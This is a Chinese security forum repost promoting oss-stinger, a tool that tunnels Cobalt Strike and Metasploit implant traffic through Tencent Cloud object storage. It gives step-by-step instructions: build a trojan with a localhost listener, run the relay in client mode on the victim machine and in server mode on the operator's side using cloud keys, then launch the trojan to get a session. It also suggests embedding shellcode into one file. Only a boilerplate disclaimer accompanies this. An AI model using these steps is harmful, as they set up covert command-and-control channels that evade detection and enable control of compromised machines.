安全矩阵

 找回密码
 立即注册
搜索
查看: 187|回复: 0

CS/MSF上线工具 -- oss-stinger

[复制链接]

177

主题

192

帖子

794

积分

高级会员

Rank: 4

积分
794
发表于 2022-11-28 14:39:39 | 显示全部楼层 |阅读模式

CS/MSF上线工具 -- oss-stinger
原文链接:CS/MSF上线工具 -- oss-stinger
9bie Web安全工具库 2022-11-28 08:00 发表于河南
===================================
免责声明
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。
0x01 工具介绍
利用腾讯云oss,来转发http流量,可以用来cs/msf线上等
0x02 安装与使用
1、首先,现在cs生成一个http的listen,并把host都改成127.0.0.1,然后生成木马 然后再把Host改会公网IP(这一步很重要)
编辑
2、然后去腾讯云,申请一个oss盘。拿到URL 然后再去拿SecretKey和
编辑
SecretID https://console.cloud.tencent.com/cam/capi
3、然后就可以使用我们的工具了,先在客机上启动一个转发器,使用命令
oss-stinger.exe -mode client -url oss桶的url地址 -address 127.0.0.1:端口 -id 腾讯云SecretID -key 腾讯云SecretKey
4、然后服务器运行
oss-stinger.exe -mode server -url oss桶的url地址 -address 127.0.0.1:端口 -id 腾讯云SecretID -key 腾讯云SecretKey
5、然后在客机双击你的木马,就能上线了
编辑
6、如果要弄成一个文件,自行修改代码把shellcode加入进去然后用go runshellcode()即可。
secretkey和secretid的安全问题,目前没有什么好的解决方案,可以考虑搞一个动态下发的。自己修改吧
下载地址:
GitHub - 9bie/oss-stinger: 利用oss实现http转发/cobalt strike上线

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2023-1-31 19:10 , Processed in 0.014020 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表